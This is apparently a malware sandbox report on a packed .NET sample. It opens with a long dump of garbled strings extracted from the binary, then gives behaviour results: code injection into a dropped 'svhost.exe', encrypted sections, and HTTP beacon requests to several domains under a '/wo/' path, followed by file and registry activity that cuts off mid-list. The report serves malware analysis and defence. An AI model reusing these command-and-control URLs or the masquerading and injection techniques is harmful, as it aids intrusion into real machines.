1u] b
I^mI
- E|
YnT\
3Pv$
%YRx
I5jMl
4+dj
y4y]
kgBOL!
l7Rbv
(( H
3_[@C6Aw
L 5D
@,.&2
ConditionalCompareObjectEqual
cF&
Kgou
iFe"
i6 M
~^?S
31X=
^g&
2gl
e/{^
STrx;H
String
9[0C
cUUN
_CorExeMain
KJZx
c #}
|)!W
g3P1
.^wF
P 6%
!)Kg4
pkbC
\+\-h
7{E
set_Key
{s.P
: ?z
"fujR
6"*6
c9w
X:p6E
t+XSd
DM//T
,R5B
kc>B%#
g::O
2I.1+
jLKD
M995
@jt
#e]m
oaWX
b~c
FileLoadException
`y&$K
9[>g
1N})'
Y| <d
Microsoft.VisualBasic.CompilerServices
Lm2
<VJC*Q5
Is}|
" W2
pa3{gDI
lY!R*
.a\S
JVo#
mrOp
%4,BP
5| T
EditorBrowsableAttribute
O *[
c9.
Jp)>
P:C3
1W^Q
1{i^
f{+&
+F..(
RL'l
4E%
2J]&
d2/%
<pHK
nu9(l
&hg6n
rJxL
{0e%
(?VY
0WBO
JR,F
Load
B*PZ
?[Y&
4f
5'7bje
NMJ)Q
Attribute
`Ywyn
2~!{L
NC/LYM
ldRbt
/]B/
bqY/
VB
fDxO
R6~6
lE s0u
=5o3
FrX!
EO5b)R
Dictionary`2
BeginInvoke
_Kf}
!&,u
?InK
j1OsWN?
am,
rKmp
$>k
get_OSVersion
S;{qR
YvC=
MjV5Q
N5y%9
}B
EO#C
-wQEx
b_+
A|j+{
Mm!rm
4zG^
7&]gS
pJ&p
DirectoryInfo
y[z,
Am7j
j;^-
!~D&
At>J
RuntimeHelpers
Njj% +
LW'n@
~`E
,K&+2
qoQE
D )Z
>wHF]6x.D
iUE0$6
get_Platform
.YBN
.kV'
f[H
ce%C
0f&KQ
Op;
Lbu&'+C
L [
N&gr#~
?
/ |l
gDXq)
-b&&&&&
u}X|
J7`5
Ci &
K%#j
i<\8
Object
Kochq
oef/
JExB
U0v&"
{E1 ;
p`$^
_Z.T J
ndt7
BadImageFormatException
"lr_Y
gs :S
0a!A
b)i\
(b8=
(R z
\9A
iG/R bF
-b8=
;Vw\,
#-D:
_"d
O_Pg
HR6
/0#H.
e6W
rMNL
gfe;I
AttributeTargets
rvOD
EditorBrowsableState
(`&_
l+o1
/Jl{
|kHx
[htI
Gi4[
QfmP
1.0.0.0
tW}b
z,]"
^{?+
x`xJP9
DM+|
Kqx'
Wq"z
60Fi7e
L+W&
QG+l
_(j
mw[3
}ga(
Stream
<6s?4
get_Modules
_h Q
UH9?
!5IM
lJmwW
kQ*r
IsNullOrEmpty
~4 <i,
F<KQ
aNy}o
jgDI
PM@`
Y1<q
=TUlH
_yeX
klSq<[
0UY
Exit
CompilationRelaxationsAttribute
x6Wz
bHqk
wti)
nO6b!
i BT
[+12
$E"1
aR7j
=ctJw
`{_d
FOm:
_caHE8
EF7W
V%4%o
#m i
A"W<
%>hr
cuu6
$5y Ph
r-nu7{u
#oc&
2 nO@
]biR
O 0=
{;(Q
kkc&9vd
zwiYMT
U<Pd
;L 5
id6~r
`6Gov
assemblyFullName
FormatException
1nd*
OperatingSystem
-[lfom$
-GE;9
H#<G
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
f*~
Gp"E/Cd
System.ComponentModel
xMj?
nw3p
&5oS
tx?QT0UL
X(Z
$@aT
?e,k
$}Z{
P/i_
R$&?
System.Threading
^V^KT
w3 0'
JIo_5
a7HL
xxi2{
{/cz,
[%(--`
G}k[
dP;R
g=6WnY
e] (.y
/]Cs
w I-i
.wXz
LgPt
=MlC
;$w]N
XF [xI
{gS1
pj2<5
LsEN
o]Xw
C\H,
]"?j
`1,t
/UJbIx
[nO
pm06
Buffer
get_Current
`X_N
eCCAK
YA:[
M*hh~
"s,
zC.E
c` M
k U;=
YG1
fU,}b
1?k!P|
]LF#
f5j6
1&K'
`N;v
+ O!
,HI55
Y=Ia
"fuq
/"]f
Qt{s
q|zS
\==Y
!jYB|
]V{d
:5y7
0lI
R9[}c
&- Qt"
pnZY
p-l*
uQ9?
9<C}
{ &6
h&{N
A= x
Ee.Z)
S"zQa
Hw5 |
9D/Q7
2UTI
XZt#
GY\k(
|p
_8Ipd
(J+_
oq#C:
=Yo
pf%d
*/u`
KillOnExit
9YQ\#
FIGD
}i)]B
get_Ticks
\|K`b
'LV z
~3^Y
d@o^
K5A:;
ke mt:=A,
N 2n
)B[E%
4] I@5xk:"
N '@`
%,92
hx+l
?K.$
^XRkh
~V&M
v2.0.50727
1h=e8
s3C
9M-
{=WMR
RK D
3VE{
!'UE
0YeP
2Rnn
~5:
^6&a^
set_Item
O,Vh
MC>m_8
t3,a8
4P;]
%WMClA+vq
ehjf
l~ pbrv,
9'c
7G<
^ISf
;$Qd
>xmj
vyx
\3C./
m;g
:.A>
`S'g*h`
F@q,
i?W+
~kwp_CA
W`q_
Exception
PN0Y
^QyH
DC I
-Wg>*
QDFCMmMzRDRlNUY2ZzdIOA==
<+!z
j*r=
ut5FZ
<r#O
get_ASCII
UP2;
v)@%DT
>M
eN6>tK
hVn&
c7k-sv
S[mK
YYxu|
MEm#
} ^'
<`*O
GetTypeFromHandle
IAsyncResult
s'H.
zGR?
#Q.S
"4<Sj#
GetEnumerator
gc5M
SymmetricAlgorithm
Z&!B
7xW\
7O>V
4d[K
QH!5]
nT\
GetDelegateForFunctionPointer
eiBj
,$_X
puJI
Int16
FfiKP
{KTnn
0r<g
ckdjY
CR@L
M?!=
A I
|gh:
#HUh
? AzI*
[|yk
Enter
sB3x
NUghWr
kg+R
e$kjx
YFQmQ
\tGT
u/t[
E NB
GetProcessById
Sr>k
%vQo
^C4<dN
\QDZ
^P48
7z`0
ConcatenateObject
DrzI
System.Runtime.InteropServices
AhN=
2]C7
OAld
Hd1R
~le+
D0Vy
Math
-D(Z
]x\pj
.9Pv
]OU8
+&++{
|xfl
v}$Z
6/=(O
>1Jy
&D:)
@FuH*}@
Qdy~n
e+787
handle
.Fw8
"|Bf
nu$
;0O<E
1Ix(P
System.Runtime.CompilerServices
;!5^
4!*
3//2
huKwyKm0
A)jU
#x$1lLCb
EpZb: J
l1y%
hP(B
$BjS
8BkEzQy
=Tv
ygk2mlf
5@xdl
fd-%
/6N j
xjcs_
{E+a
vQ11D
Z4Vw
?0*B
SL0l
6f@
TransformFinalBlock
?sMG
YzB;
n~(Hf
*Ry
;}o@
ta!q
5g$uz
VI4R
!G+
XeJr
r@;y
Close
. [
F; *|
IDisposable
Gmo4
Synchronized
kam_
)\js
F\:m9
`fj(k
&u]3v=
!3g1-
frdY`Qlw\
d&IO C
^9U
Q8DW
5u{6
YM Mom#
V"M l
DRP
set_Mode
fX.G(
0^h
|&Ao
*2*C
I_nKQ
96_qv
cx*{%~
g&1;p
\].X~
j\1w
<Module>
kBQ3
ydpM
H"N
h|!i
lQc5,
X[Z!
@[!R
MulticastDelegate
{)9A
k706
LLw3
ComputeHash
-#s\%]
pWC+
kO>
6>~6
4Ae"o
c@s+
/V29
,|r4
ex*J
9zh%
'XE{a
wLDl
o4iJDcE;
A?Nt
-"7y"`9m
add_Idle
~q Gj
DciDY
2Gl~
lHlu
pu>]
CreateEncryptor
,R(tH+
%@RW7
`IAQ
cBoK
,k\
LtMEn
w}
d% {
Ba v
"m7A
W2%S}T
>{#+|
$9pr
E|qb
EB}R
Ct<YE
AN'm
7Ww
`gxQw
YEn9
*tHr
>_ec
rP*W
d8sU
,P2`
Oog
ApplicationSettingsBase
e$%F.Y
{qdp
L4xRB
3#6DK|u
4i >Y
ArgumentOutOfRangeException
E E<
Mowa
"E?(
42.Q%[
>>_=
yk9'
{c7N
r#m_v
r[}:n
g)fK)
c}an
w?b8zS
EventHandler
N+]#*
Thread
A-Z
?i!_
Collect
{v{{aH
`LwoC
a$14
'{Kok
1wBo
X{An
jj>&
Encoding
#$mp
"Y+h
GE7~
J/m
get_CurrentThread
*EkF
Av-n
6K=<
2PS8
=l]`
smcz
wk{{
9s)X8p
get_Module
3F9+
j4 i
/'X#
fsdgsrxd.My
e9 :
DwH>
L)mD
[Zyi
[._N
Zr|7
1y~(
d4Q!
PD>"GV
x#=i
t +sf
^cuji
4JQ|
:q; q
i'H;
OC7E
~Z1~
s$GX
gP(%6n^
#dVo
gcxd
OTNc
[xX?]
U0hBMQ==
x(R W
m2{x
|'!'
\Y`
t#J\
Zero
yMt!f
|<s>
G!d9
=RHs
I3RoZW53Zm9sIw==
F>bN5B
3 !qu
;7YH
jDgN
%.Py
6fTPO
f\6V
SOaj
zE0?
dB\o
e{^>b
|. |
b<uF
hn^(@n
@$X/9)
Cr.,
YC^N}}
L*nVN
u#g|L
2&SG
qzpC.
+<+A+F (L
x3ve&
System.Collections.Generic
sPfo
fU[n
G{~y
EyQ,]*
`2n
e!*#
n"EY
L8V|9
F7A3
j>1'
System.Windows.Forms
w9}[]
zm[cUdN2
7$nx
@[mp.'
2ns"Eq*
OK#p
].BU#t
d8ly
Qn(<(
t=vxH
:hKW
A\:n
get_ModuleName
%-(/
$] i
CHG9
BQ-Rg
Y|tE
fBhEq
bv}*
-d&&&&&
,YM
GeneratedCodeAttribute
^!#1
4,?.x
.4 Y
w!;/
3Jf>n\
(B7[
F 2T
TC+
-B~3
M"$l
7>M)^
((M7+
nF"[4l
B{[s
Sleep
Lt[v^
e~|&S
-AX
T5k/
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04b_64 | Seven04b_64 | VirtualBox | 2018-07-09 23:04:14 | 2018-07-09 23:07:06 | 172 |
6 Behaviors detected by system signatures
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: i1.exe(2376) -> svhost.exe(2536)
Creates RWX memory
Severity: Medium
Confidence: Medium
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
- suspicious_request: http://www.plodameg.com/wo/?_ZLL96=GcXdlIa6ZxlqRbZegdKsNXkvbBeiEnvqHFxsuUIxgQvlLphwtCbkHoPUJWL31ZKs2L7IxmKC&GzuD=WBjTZrcXj
- suspicious_request: http://www.alexander-international.com/wo/?_ZLL96=P1GwTOxNZA38J/ty9S5FskuZ18tjN2dwSBOS9pFPubeNqfHReGsJZQWznW45HPxeFtCDSRf0&GzuD=WBjTZrcXj
- suspicious_request: http://www.alexander-international.com/wo/
- suspicious_request: http://www.ipducks.com/wo/?_ZLL96=BmONLxxZHLtt6vXOLyHcOkXnIvM0pG6jXWO82HH9Q91vB3kvQ1F/r100Oe9lPOEOlw/K7kba&GzuD=WBjTZrcXj
- suspicious_request: http://www.ipducks.com/wo/
- suspicious_request: http://www.employeevita.com/wo/?_ZLL96=9i209dyIyU9F20iTxpg1zH/IiUX0PjkcVL2t2gvEXPLkT8PW7wISloIb9cUcaBh89qBzU09+&GzuD=WBjTZrcXj
- suspicious_request: http://www.employeevita.com/wo/
- suspicious_request: http://www.pq-db.info/wo/?_ZLL96=Odgi7Y7XPUYPi+s4cd6Y2J1SxIGI1CpSP1KZdAnTJe7ElOkUKQuUU5kS6GzKFYQs888Fg/mc&GzuD=WBjTZrcXj
- suspicious_request: http://www.pq-db.info/wo/
- suspicious_request: http://www.cnweikang.com/wo/?_ZLL96=O6MuYhT6wceiJ/j+9B9XHSKAaAuNOatlCnfAnNkQptIS5zQpIKNEDDuwDnZwxrX/qeVVNQr3&GzuD=WBjTZrcXj
- suspicious_request: http://www.cnweikang.com/wo/
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://www.plodameg.com/wo/?_ZLL96=GcXdlIa6ZxlqRbZegdKsNXkvbBeiEnvqHFxsuUIxgQvlLphwtCbkHoPUJWL31ZKs2L7IxmKC&GzuD=WBjTZrcXj
- url: http://www.alexander-international.com/wo/?_ZLL96=P1GwTOxNZA38J/ty9S5FskuZ18tjN2dwSBOS9pFPubeNqfHReGsJZQWznW45HPxeFtCDSRf0&GzuD=WBjTZrcXj
- url: http://www.alexander-international.com/wo/
- url: http://www.ipducks.com/wo/?_ZLL96=BmONLxxZHLtt6vXOLyHcOkXnIvM0pG6jXWO82HH9Q91vB3kvQ1F/r100Oe9lPOEOlw/K7kba&GzuD=WBjTZrcXj
- url: http://www.ipducks.com/wo/
- url: http://www.employeevita.com/wo/?_ZLL96=9i209dyIyU9F20iTxpg1zH/IiUX0PjkcVL2t2gvEXPLkT8PW7wISloIb9cUcaBh89qBzU09+&GzuD=WBjTZrcXj
- url: http://www.employeevita.com/wo/
- url: http://www.pq-db.info/wo/?_ZLL96=Odgi7Y7XPUYPi+s4cd6Y2J1SxIGI1CpSP1KZdAnTJe7ElOkUKQuUU5kS6GzKFYQs888Fg/mc&GzuD=WBjTZrcXj
- url: http://www.pq-db.info/wo/
- url: http://www.cnweikang.com/wo/?_ZLL96=O6MuYhT6wceiJ/j+9B9XHSKAaAuNOatlCnfAnNkQptIS5zQpIKNEDDuwDnZwxrX/qeVVNQr3&GzuD=WBjTZrcXj
- url: http://www.cnweikang.com/wo/
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.89, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00030c00, virtual_size: 0x00030bc1
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04b_64 | Seven04b_64 | VirtualBox | 2018-07-09 23:04:14 | 2018-07-09 23:07:06 | 172 |
9 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\i1.exe.config C:\Users\Seven01\AppData\Local\Temp\i1.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Local\Temp\i1.exe.Local\ C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows C:\Windows\winsxs C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll \Device\KsecDD C:\Users\Seven01\AppData\Local\Temp\i1.config C:\Users\Seven01\AppData\Local\Temp\i1.INI C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol23.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI C:\Windows\System32\tzres.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI C:\Windows\Globalization\it-it.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Globalization\en-us.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\Globalization\it.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll C:\Windows\assembly\GAC_32\d3.resources\0.0.0.0_it-IT_96cbd02afd56cf46 C:\Windows\assembly\GAC_MSIL\d3.resources\0.0.0.0_it-IT_96cbd02afd56cf46 C:\Windows\assembly\GAC\d3.resources\0.0.0.0_it-IT_96cbd02afd56cf46 C:\Users\Seven01\AppData\Local\Temp\it-IT\d3.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\d3.resources\d3.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\d3.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\d3.resources\d3.resources.exe C:\Windows\assembly\GAC_32\d3.resources\0.0.0.0_it_96cbd02afd56cf46 C:\Windows\assembly\GAC_MSIL\d3.resources\0.0.0.0_it_96cbd02afd56cf46 C:\Windows\assembly\GAC\d3.resources\0.0.0.0_it_96cbd02afd56cf46 C:\Users\Seven01\AppData\Local\Temp\it\d3.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\d3.resources\d3.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\d3.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\d3.resources\d3.resources.exe C:\Users\Seven01\AppData\Local\Temp\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}.dll C:\Users\Seven01\AppData\Local\Temp\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}.dll C:\Users\Seven01\AppData\Local\Temp\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}.exe C:\Users\Seven01\AppData\Local\Temp\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}.exe C:\Windows\assembly C:\Windows\assembly\Desktop.ini C:\Windows\assembly\GAC_MSIL\{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}\0.0.0.0__3e56350693f7355e C:\Users\Seven01\AppData\Local\Temp\svhost.exe C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll C:\Windows\assembly\GAC_32\System.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\System.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC\System.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Users\Seven01\AppData\Local\Temp\it-IT\System.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\System.resources\System.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\System.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\System.resources\System.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2376.25275359 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2376.25275359 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2376.25275390 C:\Windows\SysWOW64\ntdll.dll
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\i1.exe.config C:\Users\Seven01\AppData\Local\Temp\i1.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll \Device\KsecDD C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol23.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\System32\tzres.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe C:\Windows\SysWOW64\ntdll.dll
Write Files
C:\Users\Seven01\AppData\Local\Temp\svhost.exe
Delete Files
C:\Users\Seven01\AppData\Local\Temp\svhost.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2376.25275359 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2376.25275359 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2376.25275390
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\i1.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 